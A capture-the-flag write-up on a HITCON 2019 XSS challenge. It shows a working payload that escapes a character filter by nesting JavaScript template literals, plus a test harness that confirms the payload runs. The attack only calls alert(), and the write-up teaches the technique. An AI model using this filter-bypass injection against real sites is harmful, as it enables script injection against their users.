# Bounty Pl33z

It seems that I will lose the title of ["A bag of brown lion in Hong Kong"](https://duckduckgo.com/?q=this+is+you+liking+your+own+post&t=h_&iax=images&ia=images) if I cannot solve this question, as the question was made by a grandmaster in Hong Kong.

It is an XSS challenge. The injection point is `fd.php?q=`*payload*, and `$q` is reflected three times into this inline script:

```
<script type="text/javascript">
if (window.top == window.self) {
  window.self.location.href = "https://<?=$q;?>.orange.ctf/oauth/authorize?client_id=1&scope=read&redirect_uri=https://twitter.com/orange_8361";
} else {
  var data = JSON.stringify({
    message: 'CTF.API.remote',
    data: {
      location: "https://<?=$q;?>.orange.ctf/oauth/authorize?client_id=1&scope=read&redirect_uri=https://twitter.com/orange_8361"
    }
  });
  window.parent.postMessage(
    data,
    "https://<?=$q;?>.orange.ctf"
  );
}
</script>
```

The payload is filtered if it contains more than one quote character, or any of `/`, `\`, `.`, `<` or a newline. With only one double quote available you can close the `href` string, but the rest of that line (`.orange.ctf/oauth/...";`) is then left dangling, the script no longer parses, and nothing executes.

One idea is to comment out the remainder, just like what you do in SQL injection, but `/` is blocked, so neither `//` nor `/* */` is available. (In fact the official answer uses a strange way of commenting.)

Another way is to use multiline strings, just like what you do in those programming languages that do not support multiline comments. (Yes, you, freaking Camel.) In JavaScript we can use [template literals](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals) to define multiline strings without escaping, and the backtick that delimits them is not on the blocklist. So instead of commenting the trailing code out, we swallow it into a string.
The ideal case would be to comment out everything after the first injection, but the last injection is not located at the very end of the script, so some residue, `.orange.ctf");}`, always remains after it. So the objective is to make the script parse as something like this:

```
if (window.top == window.self) {
  window.self.location.href = "https://"-xss()-(`
    some trash
  `-".orange.ctf");}
```

Another feature of template literals is substitution: `${...}` evaluates an expression inside the literal:

```
console.log(`1+2=${1+2}`) //gives 1+2=3
```

and the expression may itself be another template literal, so templates nest:

```
console.log(`1+2=${`1+2`}`) //gives 1+2=1+2
```

Nesting matters here because the three copies of the payload must open and close the right number of literals and `${` expressions so that the code between them becomes string content. After some testing I got this pattern that works:

```
`}`-"-alert()-(`${`${`${`
```

It contains exactly one `"` and none of the blocked characters. Substituted at all three injection points, the script reads like this:

```
"https://`}`-"-alert()-(`${`${`${` trash1 `}`-"-alert()-(`${`${`${` trash2 " } trash3 `}`-"-alert()-(`${`${`${`.orange.ctf" );}
```

At the first injection, the `"` in the payload closes the `href` string (the `` `}`- `` before it is just string content), `-alert()-(` is ordinary code, and `` `${`${`${` `` opens three nested `${` expressions plus a fourth template literal. Everything after that, the whole `else` branch included, is now literal text: that is trash1, which runs up to the `"https://` in front of the second injection.

At the second injection, the first backtick closes that fourth literal, `}` closes the innermost expression, and the next backtick closes the third literal. `-"` then starts a double-quoted string that swallows the rest of the payload and trash2, the original `.orange.ctf/oauth/...orange_8361` tail, up to the original closing `"`. The `}` on the next line of the original script closes the second `${` expression (lucky there is a `}` after the second payload: it is the one that closed `data: {`). After it, `});`, `window.parent.postMessage(`, `data,` and `"https://` are literal text again: trash3.

At the third injection, the backtick closes the second literal, `}` closes the outermost expression, the next backtick closes the first literal, and `-"-alert()-(`${`${`${`.orange.ctf"` is one last harmless string. The original `);` then closes the `(` opened by the first injection and `}` closes the `if`. What survives is `href = "https://`}`-" - alert() - (...)`, so `alert()` is called as soon as the page is loaded as the top window.

Replace `alert()` with your favorite payload to XSS the bot, as long as it still contains no blocked characters and no additional quotes.

###### tags: `HITCON CTF 2019 Quals`
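To check the parse traced above without a browser, here is an added example (my own code, not the challenge's or the author's): it rebuilds the `fd.php` inline script from the template quoted earlier, applies a filter reconstructed from the writeup's description (the real `fd.php` source is not shown, so treating both quote kinds as counting toward the one-quote limit is an assumption), and executes the rendered script against a stub `window` to see which payloads parse and which reach `alert()`. The names `passesFilter`, `render`, `scriptBody`, `runAsTopWindow` and `attack` are mine.

```javascript
// Added example, not the challenge's own code. Rebuilds fd.php's inline
// script, applies a filter reconstructed from the writeup's description
// (an assumption: the real fd.php is not shown), and runs the result in a
// stub window to confirm which payloads parse and which reach alert().

// Server-side template copied from the writeup; <?=$q;?> is the reflection
// point. It contains no backticks or "${", so this JS template literal
// interpolates nothing.
const FD_PHP_TEMPLATE = `<script type="text/javascript">
if (window.top == window.self) {
  window.self.location.href = "https://<?=$q;?>.orange.ctf/oauth/authorize?client_id=1&scope=read&redirect_uri=https://twitter.com/orange_8361";
} else {
  var data = JSON.stringify({
    message: 'CTF.API.remote',
    data: {
      location: "https://<?=$q;?>.orange.ctf/oauth/authorize?client_id=1&scope=read&redirect_uri=https://twitter.com/orange_8361"
    }
  });
  window.parent.postMessage(
    data,
    "https://<?=$q;?>.orange.ctf"
  );
}
</script>`;

// Filter as the writeup describes it: at most one quote character, and
// none of / \ . < or newline. Counting ' and " together is an assumption.
function passesFilter(q) {
  const quotes = (q.match(/["']/g) || []).length;
  if (quotes > 1) return false;
  return !/[\/\\.<\n]/.test(q);
}

// Reflect q at all three injection points. split/join instead of
// replace(): the payload contains "$", which replace() would interpret
// as a replacement pattern.
function render(q) {
  return FD_PHP_TEMPLATE.split('<?=$q;?>').join(q);
}

// Extract the script body from the rendered HTML.
function scriptBody(html) {
  const m = html.match(/<script[^>]*>([\s\S]*?)<\/script>/);
  if (!m) throw new Error('no <script> in rendered page');
  return m[1];
}

// Execute the script as the bot would when it opens the page directly
// (window.top === window.self), recording calls instead of side effects.
// A SyntaxError is thrown when the Function is constructed, which is the
// "script breaks, nothing runs" case from the writeup.
function runAsTopWindow(script) {
  const calls = [];
  const win = { location: { href: '' } };
  win.top = win;
  win.self = win;
  win.parent = { postMessage: (...a) => { calls.push(['postMessage', ...a]); } };
  const alert = (...a) => { calls.push(['alert', ...a]); };
  try {
    new Function('window', 'alert', script)(win, alert);
    return { ok: true, error: null, calls };
  } catch (e) {
    return { ok: false, error: e.name, calls };
  }
}

// The working pattern from the writeup: one double quote, no blocked chars.
const PAYLOAD = '`}`-"-alert()-(`${`${`${`';

// Filter, render and execute in one step.
function attack(q) {
  if (!passesFilter(q)) return { ok: false, error: 'filtered', calls: [] };
  return runAsTopWindow(scriptBody(render(q)));
}

// Constructed inputs: a benign subdomain, the two-quote payload the filter
// rejects, the one-quote payload that breaks the script, and the pattern.
for (const q of ['orange', '"-alert()-"', '"-alert()-', PAYLOAD]) {
  console.log(JSON.stringify(q), '=>', JSON.stringify(attack(q)));
}
```

The stub only models what the rendered script touches (`window.top`, `window.self`, `location.href`, `alert`), so a real bot will additionally run the redirect logic; the point is that `"-alert()-` passes the filter yet yields a `SyntaxError`, while the pattern passes the filter, parses, and records a single `alert` call with the `else` branch gone.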